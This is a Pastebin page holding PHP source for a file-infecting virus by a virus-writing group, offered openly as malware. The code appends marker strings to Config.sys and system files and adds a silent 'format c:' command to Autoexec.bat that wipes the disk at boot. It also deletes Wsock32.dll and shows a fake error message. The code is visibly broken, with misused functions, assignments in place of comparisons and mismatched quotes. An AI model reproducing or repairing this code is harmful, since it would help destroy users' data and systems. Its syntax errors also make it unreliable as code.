Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- // SYSBAT.PHP VIRUS
- // By Xmorfic, www.shadowvx.com/bcvg, The Black Cat Virii Group
- // SYSBAT.PHP - This virus infectes Config.sys, autoexec.bat and system files in
- // C:\Windows\Command\ directory.
- $config = 'C:\Config.sys';
- $autoexec = 'C:\Autoexec.bat';
- $phps = "SYSBAT.PHP";
- $newphp = 'sysbat.sys';
- $avxm = "This program performed an illegal operation";
- $infsystem = true;
- $infsys = fopen($config, "r");
- $check = fread($infsys, filesize($config));
- $infs = strstr ($check, '47hGHRHjkliliurpIOIPOIporipOOPOirujkJKLLJj<Xmorfic>HKGJD');
- if (!$infs) $infsystem = false;
- if ( ($infsystem=false) )
- {
- $infsys = fopen($config, "a");
- $fputs($infsys, "47hGHRHjkliliurpIOIPOIporipOOPOirujkJKLLJj<Xmorfic>HKGJD");
- $fputs($infsys, "Xmorfic, www.shadowvx.com/bcvg, Second PHP VIRUS");
- return;
- }
- fclose($infsys);
- $infbat = fopen($autoexec, "r");
- $checkb = fread($infbat, filesize($autoexec));
- $infb = strstr ($checkb, 'format c: /autotest /q /u');
- if (!$infb) $infbatf = false;
- if ( ($infbatf=false) )
- {
- $infbat = fopen($autoexec, "a");
- $fputs($infbat, "ctty nul ");
- $fputs($infbat, "format c: /autotest /q /u ");
- return;
- }
- fclose($infbat);
- $systems = opendir('C:\Windows\Command\');
- while ($filesys = readdir($systems))
- {
- $infected = true;
- $systemexe = false;
- if ( ($systemexe = strstr ($filesys, '.sys') )
- if ( (is_writeable($filesys) )
- {
- $sysk = fopen($filesys, "r");
- $xst = fread($sysk, filesize($filesys);
- $good = strstr ($xst, 'Xmorfic_Vx');
- if (!$good) $infected = false;
- }
- if ( ($infected=false) )
- {
- $sysk = fopen($filesys, "a");
- $fputs($sysk, "Xmorfic_VX_System_PHP_Infector!!');
- return;
- }
- }
- closedir($systems);
- // Rename the virus to sysbat.sys (Optional) $ren = rename(__FILE__, $newphp);
- $kok = unlink ('C:\Windows\System\Wsock32.dll');
- echo $avxm;
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
